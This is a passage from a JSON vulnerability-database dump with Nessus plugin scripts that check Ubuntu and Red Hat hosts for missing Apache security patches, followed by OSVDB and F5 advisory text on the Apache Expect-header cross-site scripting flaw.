"p-cpe:/a:canonical:ubuntu_linux:apache2.2-common", "p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-worker", "p-cpe:/a:canonical:ubuntu_linux:apache2-threaded-dev", "p-cpe:/a:canonical:ubuntu_linux:apache2-doc", "p-cpe:/a:canonical:ubuntu_linux:apache2-common", "p-cpe:/a:canonical:ubuntu_linux:apache2-utils", "cpe:/o:canonical:ubuntu_linux:7.04", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts"], "id": "UBUNTU_USN-575-1.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=30184", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-575-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(30184);\n script_version(\"1.21\");\n script_cvs_date(\"Date: 2018/08/06 14:03:15\");\n\n script_cve_id(\"CVE-2006-3918\", \"CVE-2007-3847\", \"CVE-2007-4465\", \"CVE-2007-5000\", \"CVE-2007-6388\", \"CVE-2007-6421\", \"CVE-2007-6422\", \"CVE-2008-0005\");\n script_bugtraq_id(19661, 25489, 25653, 26838, 27234, 27236, 27237);\n script_xref(name:\"USN\", value:\"575-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 6.10 / 7.04 / 7.10 : apache2 vulnerabilities (USN-575-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that Apache did not sanitize the Expect header from\nan HTTP request when it is reflected back in an error message, which\ncould result in browsers becoming vulnerable to cross-site scripting\nattacks when processing the output. With cross-site scripting\nvulnerabilities, if a user were tricked into viewing server output\nduring a crafted server request, a remote attacker could exploit this\nto modify the contents, or steal confidential data (such as\npasswords), within the same domain. This was only vulnerable in Ubuntu\n6.06. (CVE-2006-3918)\n\nIt was discovered that when configured as a proxy server and using a\nthreaded MPM, Apache did not properly sanitize its input. A remote\nattacker could send Apache crafted date headers and cause a denial of\nservice via application crash. By default, mod_proxy is disabled in\nUbuntu. (CVE-2007-3847)\n\nIt was discovered that mod_autoindex did not force a character set,\nwhich could result in browsers becoming vulnerable to cross-site\nscripting attacks when processing the output. (CVE-2007-4465)\n\nIt was discovered that mod_imap/mod_imagemap did not force a character\nset, which could result in browsers becoming vulnerable to cross-site\nscripting attacks when processing the output. By default,\nmod_imap/mod_imagemap is disabled in Ubuntu. (CVE-2007-5000)\n\nIt was discovered that mod_status when status pages were available,\nallowed for cross-site scripting attacks. By default, mod_status is\ndisabled in Ubuntu. (CVE-2007-6388)\n\nIt was discovered that mod_proxy_balancer did not sanitize its input,\nwhich could result in browsers becoming vulnerable to cross-site\nscripting attacks when processing the output. By default,\nmod_proxy_balancer is disabled in Ubuntu. This was only vulnerable in\nUbuntu 7.04 and 7.10. (CVE-2007-6421)\n\nIt was discovered that mod_proxy_balancer could be made to dereference\na NULL pointer. A remote attacker could send a crafted request and\ncause a denial of service via application crash. By default,\nmod_proxy_balancer is disabled in Ubuntu. This was only vulnerable in\nUbuntu 7.04 and 7.10. (CVE-2007-6422)\n\nIt was discovered that mod_proxy_ftp did not force a character set,\nwhich could result in browsers becoming vulnerable to cross-site\nscripting attacks when processing the output. By default,\nmod_proxy_ftp is disabled in Ubuntu. (CVE-2008-0005).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(79, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-event\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-perchild\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-prefork\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-mpm-worker\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-prefork-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-src\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-threaded-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:apache2.2-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libapr0-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:7.10\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/02/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/02/05\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/05/08\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2008-2018 Canonical, Inc. / NASL script (C) 2008-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|6\\.10|7\\.04|7\\.10)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 6.10 / 7.04 / 7.10\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2\", pkgver:\"2.0.55-4ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-common\", pkgver:\"2.0.55-4ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-doc\", pkgver:\"2.0.55-4ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-mpm-perchild\", pkgver:\"2.0.55-4ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-mpm-prefork\", pkgver:\"2.0.55-4ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-mpm-worker\", pkgver:\"2.0.55-4ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-prefork-dev\", pkgver:\"2.0.55-4ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-threaded-dev\", pkgver:\"2.0.55-4ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"apache2-utils\", pkgver:\"2.0.55-4ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libapr0\", pkgver:\"2.0.55-4ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"libapr0-dev\", pkgver:\"2.0.55-4ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"apache2\", pkgver:\"2.0.55-4ubuntu4.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"apache2-common\", pkgver:\"2.0.55-4ubuntu4.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"apache2-doc\", pkgver:\"2.0.55-4ubuntu4.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"apache2-mpm-perchild\", pkgver:\"2.0.55-4ubuntu4.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"apache2-mpm-prefork\", pkgver:\"2.0.55-4ubuntu4.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"apache2-mpm-worker\", pkgver:\"2.0.55-4ubuntu4.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"apache2-prefork-dev\", pkgver:\"2.0.55-4ubuntu4.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"apache2-threaded-dev\", pkgver:\"2.0.55-4ubuntu4.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"apache2-utils\", pkgver:\"2.0.55-4ubuntu4.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libapr0\", pkgver:\"2.0.55-4ubuntu4.2\")) flag++;\nif (ubuntu_check(osver:\"6.10\", pkgname:\"libapr0-dev\", pkgver:\"2.0.55-4ubuntu4.2\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"apache2\", pkgver:\"2.2.3-3.2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"apache2-doc\", pkgver:\"2.2.3-3.2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"apache2-mpm-event\", pkgver:\"2.2.3-3.2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"apache2-mpm-perchild\", pkgver:\"2.2.3-3.2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"apache2-mpm-prefork\", pkgver:\"2.2.3-3.2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"apache2-mpm-worker\", pkgver:\"2.2.3-3.2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"apache2-prefork-dev\", pkgver:\"2.2.3-3.2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"apache2-src\", pkgver:\"2.2.3-3.2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"apache2-threaded-dev\", pkgver:\"2.2.3-3.2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"apache2-utils\", pkgver:\"2.2.3-3.2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.04\", pkgname:\"apache2.2-common\", pkgver:\"2.2.3-3.2ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"apache2\", pkgver:\"2.2.4-3ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"apache2-doc\", pkgver:\"2.2.4-3ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"apache2-mpm-event\", pkgver:\"2.2.4-3ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"apache2-mpm-perchild\", pkgver:\"2.2.4-3ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"apache2-mpm-prefork\", pkgver:\"2.2.4-3ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"apache2-mpm-worker\", pkgver:\"2.2.4-3ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"apache2-prefork-dev\", pkgver:\"2.2.4-3ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"apache2-src\", pkgver:\"2.2.4-3ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"apache2-threaded-dev\", pkgver:\"2.2.4-3ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"apache2-utils\", pkgver:\"2.2.4-3ubuntu0.1\")) flag++;\nif (ubuntu_check(osver:\"7.10\", pkgname:\"apache2.2-common\", pkgver:\"2.2.4-3ubuntu0.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2 / apache2-common / apache2-doc / apache2-mpm-event / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:37:54", "references": ["https://www.redhat.com/security/data/cve/CVE-2006-3918.html", "https://www.redhat.com/security/data/cve/CVE-2007-1349.html", "https://www.redhat.com/security/data/cve/CVE-2005-3352.html", "https://www.redhat.com/security/data/cve/CVE-2006-5752.html", "https://www.redhat.com/security/data/cve/CVE-2006-1329.html", "https://www.redhat.com/security/data/cve/CVE-2007-3304.html", "https://www.redhat.com/security/data/cve/CVE-2004-0885.html", "https://www.redhat.com/security/data/cve/CVE-2004-0488.html", "https://www.redhat.com/security/data/cve/CVE-2007-4465.html", "https://www.redhat.com/security/data/cve/CVE-2007-6388.html", "https://www.redhat.com/security/data/cve/CVE-2004-0700.html", "https://www.redhat.com/security/data/cve/CVE-2007-5000.html", "http://rhn.redhat.com/errata/RHSA-2008-0523.html"], "pluginID": "63857", "description": "Red Hat Network Proxy Server version 4.2.3 is now available. This update includes fixes for a number of security issues in Red Hat Network Proxy Server components.\n\nThis update has been rated as having low security impact by the Red Hat Security Response Team.\n\nThe Red Hat Network Proxy Server 4.2.3 release corrects several security vulnerabilities in several shipped components. In a typical operating environment, these components are not exposed to users of Proxy Server in a vulnerable manner. These security updates will reduce risk in unique Proxy Server environments.\n\nMultiple flaws were fixed in the Apache HTTPD server. These flaws could result in a cross-site scripting or denial-of-service attack.\n(CVE-2007-6388, CVE-2007-5000, CVE-2007-4465, CVE-2007-3304, CVE-2006-5752, CVE-2006-3918, CVE-2005-3352)\n\nA denial-of-service flaw was fixed in mod_perl. (CVE-2007-1349)\n\nMultiple flaws in mod_ssl. (CVE-2004-0488, CVE-2004-0700, CVE-2004-0885)\n\nA denial-of-service flaw was fixed in the jabberd server.\n(CVE-2006-1329)\n\nUsers of Red Hat Network Proxy Server 4.2 are advised to upgrade to 4.2.3, which resolves these issues.", "edition": 5, "reporter": "Tenable", "published": "2013-01-24T00:00:00", "title": "RHEL 3 / 4 : Proxy Server (RHSA-2008:0523)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "naslFamily": "Red Hat Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0700", "CVE-2006-3918", "CVE-2004-0885", "CVE-2007-4465", "CVE-2007-3304", "CVE-2007-1349", "CVE-2006-5752", "CVE-2007-6388", "CVE-2007-5000", "CVE-2004-0488", "CVE-2005-3352", "CVE-2006-1329"], "modified": "2017-01-10T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:rhn-modperl", "p-cpe:/a:redhat:enterprise_linux:rhn-apache", "p-cpe:/a:redhat:enterprise_linux:jabberd"], "id": "REDHAT-RHSA-2008-0523.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=63857", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0523. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(63857);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2017/01/10 18:05:23 $\");\n\n script_cve_id(\"CVE-2004-0488\", \"CVE-2004-0700\", \"CVE-2004-0885\", \"CVE-2005-3352\", \"CVE-2006-1329\", \"CVE-2006-3918\", \"CVE-2006-5752\", \"CVE-2007-1349\", \"CVE-2007-3304\", \"CVE-2007-4465\", \"CVE-2007-5000\", \"CVE-2007-6388\");\n script_xref(name:\"RHSA\", value:\"2008:0523\");\n\n script_name(english:\"RHEL 3 / 4 : Proxy Server (RHSA-2008:0523)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Red Hat Network Proxy Server version 4.2.3 is now available. This\nupdate includes fixes for a number of security issues in Red Hat\nNetwork Proxy Server components.\n\nThis update has been rated as having low security impact by the Red\nHat Security Response Team.\n\nThe Red Hat Network Proxy Server 4.2.3 release corrects several\nsecurity vulnerabilities in several shipped components. In a typical\noperating environment, these components are not exposed to users of\nProxy Server in a vulnerable manner. These security updates will\nreduce risk in unique Proxy Server environments.\n\nMultiple flaws were fixed in the Apache HTTPD server. These flaws\ncould result in a cross-site scripting or denial-of-service attack.\n(CVE-2007-6388, CVE-2007-5000, CVE-2007-4465, CVE-2007-3304,\nCVE-2006-5752, CVE-2006-3918, CVE-2005-3352)\n\nA denial-of-service flaw was fixed in mod_perl. (CVE-2007-1349)\n\nMultiple flaws in mod_ssl. (CVE-2004-0488, CVE-2004-0700,\nCVE-2004-0885)\n\nA denial-of-service flaw was fixed in the jabberd server.\n(CVE-2006-1329)\n\nUsers of Red Hat Network Proxy Server 4.2 are advised to upgrade to\n4.2.3, which resolves these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2004-0488.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2004-0700.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2004-0885.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2005-3352.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2006-1329.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2006-3918.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2006-5752.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-1349.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-3304.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-4465.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-5000.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2007-6388.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2008-0523.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jabberd, rhn-apache and / or rhn-modperl packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(79, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jabberd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhn-apache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:rhn-modperl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2017 Tenable Network Security, Inc.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"jabberd-2.0s10-3.37.rhn\")) flag++;\nif (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"rhn-apache-1.3.27-36.rhn.rhel3\")) flag++;\nif (rpm_check(release:\"RHEL3\", cpu:\"i386\", reference:\"rhn-modperl-1.29-16.rhel3\")) flag++;\n\nif (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"jabberd-2.0s10-3.38.rhn\")) flag++;\nif (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"rhn-apache-1.3.27-36.rhn.rhel4\")) flag++;\nif (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"rhn-modperl-1.29-16.rhel4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:24", "references": [], "edition": 1, "description": "## Solution Description\nUpgrade to version 1.3.35, 2.0.58, 2.2.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## References:\nVendor URL: http://httpd.apache.org/\nVendor Specific News/Changelog Entry: http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18&ID=3117\nVendor Specific News/Changelog Entry: http://svn.apache.org/viewvc?view=rev&revision=394965\n[Vendor Specific Advisory URL](http://www.us.debian.org/security/2006/dsa-1167)\n[Vendor Specific Advisory URL](http://www-1.ibm.com/support/docview.wss?uid=swg24013080)\n[Vendor Specific Advisory URL](ftp://patches.sgi.com/support/free/security/advisories/20060801-01-P.asc)\n[Vendor Specific Advisory URL](http://support.avaya.com/elmodocs2/security/ASA-2006-194.htm)\n[Vendor Specific Advisory URL](http://openbsd.org/errata.html#httpd2)\n[Secunia Advisory ID:1016569](https://secuniaresearch.flexerasoftware.com/advisories/1016569/)\n[Secunia Advisory ID:21478](https://secuniaresearch.flexerasoftware.com/advisories/21478/)\n[Secunia Advisory ID:21598](https://secuniaresearch.flexerasoftware.com/advisories/21598/)\n[Secunia Advisory ID:21848](https://secuniaresearch.flexerasoftware.com/advisories/21848/)\n[Secunia Advisory ID:22317](https://secuniaresearch.flexerasoftware.com/advisories/22317/)\n[Secunia Advisory ID:22523](https://secuniaresearch.flexerasoftware.com/advisories/22523/)\n[Secunia Advisory ID:21744](https://secuniaresearch.flexerasoftware.com/advisories/21744/)\n[Secunia Advisory ID:21986](https://secuniaresearch.flexerasoftware.com/advisories/21986/)\n[Secunia Advisory ID:21399](https://secuniaresearch.flexerasoftware.com/advisories/21399/)\n[Secunia Advisory ID:21172](https://secuniaresearch.flexerasoftware.com/advisories/21172/)\n[Secunia Advisory ID:22140](https://secuniaresearch.flexerasoftware.com/advisories/22140/)\nRedHat RHSA: RHSA-2006:0618\nRedHat RHSA: RHSA-2006:0692\nOther Advisory URL: http://lists.suse.com/archive/suse-security-announce/2006-Sep/0004.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0151.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0425.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0441.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0456.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-11/0102.html\nFrSIRT Advisory: ADV-2006-2963\nFrSIRT Advisory: ADV-2006-2964\n[CVE-2006-3918](https://vulners.com/cve/CVE-2006-3918)\n", "reporter": "OSVDB", "published": "2006-05-08T07:04:07", "title": "Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-3918"], "modified": "2006-05-08T07:04:07", "href": "https://vulners.com/osvdb/OSVDB:27487", "id": "OSVDB:27487", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "f5": [{"lastseen": "2017-10-12T02:11:18", "references": [], "edition": 1, "description": "**Note:** Versions that are not listed in this article have not been evaluated for vulnerability to this security advisory. For information about the F5 security policy regarding evaluating older and unsupported versions of F5 products, refer to [K4602: Overview of F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>).\n\n**F5 products and versions that have been evaluated for this Security Advisory**\n\nProduct | Affected | Not Affected \n---|---|--- \nBIG-IP LTM | 9.0.0 - 9.2.5 | 9.3.x \n9.4.x \n9.6.x \n10.x \n11.x \nBIG-IP GTM | 9.2.2 - 9.2.5 | 9.3.x \n9.4.x \n10.x \n11.x \nBIG-IP ASM | 9.2.0 - 9.2.5 | 9.3.x \n9.4.x \n10.x \n11.x \nBIG-IP Link Controller | 9.2.2 - 9.2.5 \n| 9.3.x \n9.4.x \n10.x \n11.x \nBIG-IP WebAccelerator | None | 9.4.x \n10.x \n11.x \nBIG-IP PSM | None | 9.4.x \n10.x \n11.x \nBIG-IP WAN Optimization | None | 10.x \n11.x \nBIG-IP APM | None | 10.x \n11.x \nBIG-IP Edge Gateway | None | 10.x \n11.x \nBIG-IP Analytics \n| None | 11.x \nBIG-IP AFM | None | 11.x \nBIG-IP PEM \n| None | 11.x \nFirePass | 3.1.0 - 5.5.1 \n6.0.0 | 5.5.2 \n6.0.1 - 6.1.0 \n7.x \nEnterprise Manager | None | 1.x \n2.x \n3.x \n \n \nThe vulnerability exists in the Apache web server, which is used by FirePass. Apache will not sanitize the contents of the HTTP Expect header when receiving an HTTP request. Instead, the contents of the Expect header will be returned in a successful HTTP response. This permits executable code such as JavaScript that is inserted into the HTTP Expect header to be executed by the browser in the security context of the web site whose page was returned. A cross-site scripting attack may be permitted as a result, which can disclose sensitive information or perform other malicious actions.\n\nThis vulnerability is difficult to exploit because insertion of code into an HTTP header would generally require an attacker to have exploited another, more serious vulnerability in the browser. It is not sufficient to create a hyperlink with exploit code embedded in the URL parameters, as is the case with the standard cross-site scripting technique. Although ActiveX and the ActionScript language available in Adobe/Macromedia Flash have the capability to craft HTTP requests, including headers and proof-of-concepts, the constraint of having to first download a malicious ActiveX control or Flash file makes this vulnerability unlikely to be exploited.\n\nInformation about this advisory is available at the following 